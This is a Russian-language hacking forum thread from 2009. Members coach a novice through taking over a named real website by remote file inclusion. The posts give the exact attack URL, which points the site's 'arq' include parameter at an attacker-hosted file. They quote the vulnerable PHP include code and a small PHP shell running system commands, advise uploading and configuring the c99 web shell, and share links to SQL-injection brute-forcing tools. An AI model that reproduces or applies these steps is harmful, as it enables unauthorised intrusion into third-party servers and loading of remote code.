ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.06.2009, 10:47
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Подскажите программы,работающие независимо друг друга:
1. Для автоматизированного подбора полей.
2. Для автоматизированного подбора столбцов.
3. Для брута имен столбцов.
SIPT 4.0 НЕ ПОДХОДИТ))
|
|
|
15.06.2009, 10:50
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
странный чел - а где расширение файла? А что там внутри - мне гадать надо?  )
вот нормальный, рабочий шелл
https://forum.antichat.ru/thread125103.html
заливай на народ.ру, подключай и не забывай указывать расширение файла (тут самый простой, классический RFI - не надо мудрствовать)
PS: Единственное, обзови его .txt, а не php, я тебе еще в пером посте написал - .txt расширение, не php |
|
|
|
15.06.2009, 10:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от main()
Люди подскажите плиз. нашол сайт с пхп инклудом. зарегал хостинг, скрипт на пхп написал такой.
<?php
print("<h3>SHELL</h3>");
print(system("ls -al"));
?>
подставил так
http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.php
отобразилось токо слов SHELL.
Подскажите, как взять сервак под контроль?
ты не так ввел)))надо так http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.txt
что бы в конце было не пхп а тхт
P.S. пл* у кого корявblе сообщение что аш раздуваются посты ))))
если не понял то стукани в асю
Последний раз редактировалось HAXTA4OK; 15.06.2009 в 10:55..
|
|
|
|
15.06.2009, 10:54
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от jecka3000
Подскажите программы,работающие независимо друг друга:
1. Для автоматизированного подбора полей.
2. Для автоматизированного подбора столбцов.
3. Для брута имен столбцов.
SIPT 4.0 НЕ ПОДХОДИТ))
Код:
http://pashkela.narod.ru/progi/MySql4Bruter.rar - брутер mysql4
http://pashkela.narod.ru/progi/MySQL_column.rar - подбор кол-ва колонок
не всегда пашут, т.к. нет замены /**/ на просто пробел или плюс и прочее. Readme в комплекте
|
|
|
|
15.06.2009, 11:20
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Pashkela, спб за софт, но я так понял, что прога для поиска количесвта колнок подбирает только лишь принтабельный столбец, а сами колонки она игнорирует....)
|
|
|
|
15.06.2009, 11:24
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Народ я умею проводить SQL-inj Но не умею PHP
ПОдскажите можно ли тут что-то сделать
ССылка вида
http://www.сайт.ru/index.php?p=about'
Warning: readfile(./404) [function.readfile]: failed to open stream: No such file or directory in /home/сайт/data/www/сайт.ru/skin/skin.php on line 106
|
|
|
|
15.06.2009, 11:27
|
|
Banned
Регистрация: 10.06.2009
Сообщений: 8
Провел на форуме:
23709
Репутация:
6
|
|
pashkelka,haxtachak спасибо что разъяснили. Я нашол в нете shell c99. залил на народ и запустил. первый раз ничего не отбразилось. 2 раз когда подрдактировал
$surl = "http://catenabrasil.com/portal/index.php?arq="; //link to this script, INCLUDE "?".
чтото появилось, но работает очень жопно.
вот взгляните:
и при попытке открыть что либо выскакивает эта шняга.
Warning: include_once(act=ls) [function.include-once]: failed to open stream: No such file or directory in /home/catenabrasil/www/portal/index.php on line 69
Warning: include_once() [function.include]: Failed opening 'act=ls' for inclusion (include_path='.:/usr/share/pear/:/usr/lib/php/') in /home/catenabrasil/www/portal/index.php on line 69
PS обясните плиз новичку. я первый раз делаю такое
модет кто даст линки на более простые шеллы и описание их конфига?
Последний раз редактировалось main(); 15.06.2009 в 11:34..
|
|
|
|
15.06.2009, 11:27
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Pashkela
странный чел - а где расширение файла? А что там внутри - мне гадать надо? )
.....
заливай на народ.ру, подключай и не забывай указывать расширение файла (тут самый простой, классический RFI - не надо мудрствовать)
....
PS: Единственное, обзови его .txt, а не php, я тебе еще в пером посте написал - .txt расширение, не php Дружище, я смотрю вчерашняя беседа прошла даром.
Вот код из скрипта:
PHP код:
<?
$arq = $_REQUEST["arq"];
if ((isset($arq)) and ($arq != "")){
include_once($arq);
}
elseif (isset($_POST['keyGen'])){
include_once($arq);
}
else {
include_once('empresa.php');
}
?>
ЭТО ИНКЛУД!!! И ему абсолютно пофигу какое расширение и есть ли оно вообще. И уж тем-более на народе.
ЗЫ Только не надо мне рассказывать , что при инклуде .php он исполнится на стороне того сервера, (я это как-бэ знаю). Народ это не тот случай, и не путай новичка пожалуйста
|
|
|
|
15.06.2009, 11:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 jokester:
Да, я и не спорю, просто в данном конкретном случае .php не прокатывало никак, на народе, извините, .php не может "исполница"
Вот не работало и всё. Только .txt прокатывало или любое другое расширение, кроме .php
Проверь плиз, может я ваще после выходных с катушек съехал )
PS: А, дошло, если с99 запороленный - то фиг, wso2 пофигу, поэтому так и подумал
В общем jokester прав как всегда )
загвоздка была в том, чтобы с99 не был запороленный |
|
|
|
15.06.2009, 11:39
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Pashkela
2 jokester:
Да, я и не спорю, просто в данном конкретном случае .php не прокатывало никак, на народе, извините, .php не может "исполница"
Вот не работало и всё. Только .txt прокатывало или любое другое расширение, кроме .php
Проверь плиз, может я ваще после выходных с катушек съехал ) Отлично всё работает
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
